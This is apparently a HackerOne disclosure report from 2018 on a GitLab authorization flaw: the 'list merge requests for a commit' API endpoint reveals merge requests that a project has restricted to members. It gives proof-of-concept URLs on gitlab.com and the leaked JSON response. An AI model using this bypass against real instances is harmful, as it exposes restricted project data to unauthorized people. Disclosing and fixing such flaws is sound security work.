Private MR Disclosed Through Related MR Commit API endpoint

HackerOne report #453400 by ngalog on 2018-12-01:

Summary: A public project could set MRs to be accessible only by project members. (Project Settings -> Permissions) After setting that permission, non-members will see a 403 when they visit https://{gitlab}/api/v4/projects/{id}/merge_requests However when they visit /projects/:id/repository/commits/:sha/merge_requests, the details of the MR is disclosed nonetheless.

Reference: (API)[https://docs.gitlab.com/ee/api/commits.html#list-merge-requests-associated-with-a-commit]

Quick PoC in gitlab.com

Visit https://gitlab.com/api/v4/projects/9696224/merge_requests without any session, you should expect to see 403. it proves MR of this project is confidential, not open to public.
Visit https://gitlab.com/api/v4/projects/9696224/repository/commits/f4ec51c29fdbf71c85e14809c21328135ba75c9f/merge_requests without any session, you should see below response

[
  {
    "id": 20154978,
    "iid": 3,
    "project_id": 9696224,
    "title": "Suppose to be privaet merge request",
    "description": "privaet MR",
    "state": "opened",
    "created_at": "2018-11-30T23:47:26.027Z",
    "updated_at": "2018-11-30T23:57:11.196Z",
    "merged_by": null,
    "merged_at": null,
    "closed_by": null,
    "closed_at": null,
    "target_branch": "master",
    "source_branch": "mastera",
    "upvotes": 0,
    "downvotes": 0,
    "author": {
      "id": 3012741,
      "name": "Ashley Johnson",
      "username": "ashleyjohnson",
      "state": "active",
      "avatar_url": "https://secure.gravatar.com/avatar/ee7d3f1eafcb8903d47527c1590722f4?s=80&d=identicon",
      "web_url": "https://gitlab.com/ashleyjohnson"
    },
    "assignee": null,
    "source_project_id": 9696224,
    "target_project_id": 9696224,
    "labels": [],
    "work_in_progress": false,
    "milestone": null,
    "merge_when_pipeline_succeeds": false,
    "merge_status": "can_be_merged",
    "sha": "f4ec51c29fdbf71c85e14809c21328135ba75c9f",
    "merge_commit_sha": null,
    "user_notes_count": 0,
    "discussion_locked": null,
    "should_remove_source_branch": null,
    "force_remove_source_branch": false,
    "web_url": "https://gitlab.com/new-jjj-groupaaa/newnewthing/merge_requests/3",
    "time_stats": {
      "time_estimate": 0,
      "total_time_spent": 0,
      "human_time_estimate": null,
      "human_total_time_spent": null
    },
    "squash": false,
    "approvals_before_merge": null
  }
]

Impact

MR disclosure

Edited Dec 03, 2018 by Dennis Appelt